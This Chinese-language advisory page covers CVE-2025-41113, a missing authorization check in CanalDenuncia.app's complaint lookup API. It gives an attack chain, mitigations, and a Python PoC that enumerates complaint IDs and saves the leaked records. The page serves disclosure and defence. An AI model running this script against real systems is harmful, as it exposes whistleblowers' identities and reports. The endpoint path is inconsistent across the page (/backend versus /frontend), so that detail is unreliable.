CVE-2025-41113: CanalDenuncia.app 授权绕过漏洞允许未授权访问用户信息

漏洞信息

漏洞编号

CVE-2025-41113

漏洞类型

授权绕过/越权访问

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CanalDenuncia.app

漏洞概述

CVE-2025-41113是发生在CanalDenuncia.app应用中的一个高危授权绕过漏洞。该漏洞存在于后端API接口'/backend/api/buscarDenunciaByPin.php'中，由于程序对用户请求的授权验证机制不完善，攻击者可以在无需任何认证的情况下，通过构造恶意的POST请求并指定任意'id_denuncia'参数值来访问系统中其他用户的敏感投诉信息。CanalDenuncia.app是一个用于处理和管理投诉举报的应用程序，通常包含用户提交的敏感信息和举报内容。该漏洞的CVSS评分为7.5，属于高危级别，主要威胁到系统的机密性，攻击者可以获取大量用户的敏感投诉数据，包括举报人信息、投诉内容、处理状态等敏感信息。此类信息泄露可能导致严重的隐私侵犯问题，同时也会影响举报人的安全，尤其是在涉及腐败、欺诈等敏感举报场景中。漏洞由INCIBE-CERT团队发现并协调披露，建议受影响的组织尽快采取修复措施。

技术细节

该漏洞属于OWASP Top 10中的'A01:2021 - Broken Access Control'类别。在CanalDenuncia.app的后端实现中，'/backend/api/buscarDenunciaByPin.php'接口在处理用户通过POST方法提交的'id_denuncia'参数时，未正确验证当前请求发起者是否具有访问对应投诉记录的权限。正常业务流程中，用户应当只能访问自己提交的投诉记录（通常通过会话中的用户ID与投诉记录的owner进行匹配验证），但由于缺少这一关键的身份校验逻辑，攻击者只需遍历不同的id_denuncia值即可枚举访问系统中所有投诉记录。攻击者可以通过编写简单的脚本，构造HTTP POST请求，设置Content-Type为application/x-www-form-urlencoded或application/json，然后在请求体中包含id_denuncia参数和目标投诉ID，即可获取该投诉的完整信息，包括投诉人信息、投诉内容、处理进度等敏感数据。由于该接口对请求来源没有进行有效的身份验证和授权检查，且支持自动化批量请求，攻击者可以在短时间内大规模窃取用户数据。

攻击链分析

STEP 1

步骤1

攻击者发现目标网站使用CanalDenuncia.app应用，识别到存在未授权访问漏洞的后端接口/frontend/api/buscarDenunciaByPin.php

STEP 2

步骤2

攻击者构造HTTP POST请求，设置Content-Type为application/x-www-form-urlencoded，在请求体中包含id_denuncia参数

STEP 3

步骤3

攻击者无需提供任何认证信息（如会话Cookie、Token等），直接发送POST请求到目标接口

STEP 4

步骤4

服务端错误地返回了请求的id_denuncia对应的投诉记录，包括投诉人信息、投诉内容、处理状态等敏感数据

STEP 5

步骤5

攻击者通过脚本自动化遍历不同的id_denuncia值（1到N），大规模批量获取系统中所有用户的敏感投诉信息

STEP 6

步骤6

攻击者将窃取的数据用于后续恶意用途，如身份盗窃、敲诈勒索、情报收集或出售给第三方

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-41113 PoC - CanalDenuncia.app Authorization Bypass
# Target: /backend/api/buscarDenunciaByPin.php
# Vulnerability: Missing authorization check on id_denuncia parameter

TARGET_URL = "http://target-website.com/backend/api/buscarDenunciaByPin.php"

def exploit_unauthorized_access(start_id=1, end_id=1000):
    """
    Exploit unauthorized access to user complaint information
    by iterating through id_denuncia parameter values.
    """
    results = []
    
    for complaint_id in range(start_id, end_id + 1):
        # Construct POST request with arbitrary id_denuncia value
        payload = {
            'id_denuncia': str(complaint_id)
        }
        
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        }
        
        try:
            # Send unauthorized request - no authentication required
            response = requests.post(TARGET_URL, data=payload, headers=headers, timeout=10)
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    if data and 'data' in data:
                        print(f"[+] Found complaint ID {complaint_id}: {json.dumps(data, indent=2)}")
                        results.append({
                            'id': complaint_id,
                            'data': data
                        })
                except json.JSONDecodeError:
                    # Response might be HTML or plain text
                    if 'denuncia' in response.text.lower() or 'complaint' in response.text.lower():
                        print(f"[+] Found data for ID {complaint_id}")
                        results.append({
                            'id': complaint_id,
                            'raw_response': response.text[:500]
                        })
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing ID {complaint_id}: {e}")
    
    return results

if __name__ == "__main__":
    print("="*60)
    print("CVE-2025-41113 PoC - CanalDenuncia.app Authorization Bypass")
    print("="*60)
    print("\n[*] Exploiting missing authorization check...")
    print("[*] Target: " + TARGET_URL)
    print("[*] No authentication required!")
    print("-"*60)
    
    # Extract complaints with IDs from 1 to 100
    leaked_data = exploit_unauthorized_access(start_id=1, end_id=100)
    
    print(f"\n[+] Total leaked complaints: {len(leaked_data)}")
    if leaked_data:
        with open('cve_2025_41113_leaked_data.json', 'w') as f:
            json.dump(leaked_data, f, indent=2)
        print("[+] Data saved to cve_2025_41113_leaked_data.json")

影响范围

CanalDenuncia.app 所有已知版本均受影响（具体版本范围未知，需联系厂商确认）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 通过Web应用防火墙(WAF)规则限制对/frontend/api/buscarDenunciaByPin.php接口的访问，仅允许受信任的IP地址访问；2) 临时关闭该接口的外部访问，使用户只能通过已认证的前端界面访问投诉信息；3) 实施IP黑名单机制，阻断已知攻击源的请求；4) 增加请求频率限制，减缓自动化攻击的效率；5) 启用详细的访问日志和实时告警机制，及时发现异常访问模式；6) 建议用户定期更换账户密码，并关注是否有异常数据泄露迹象。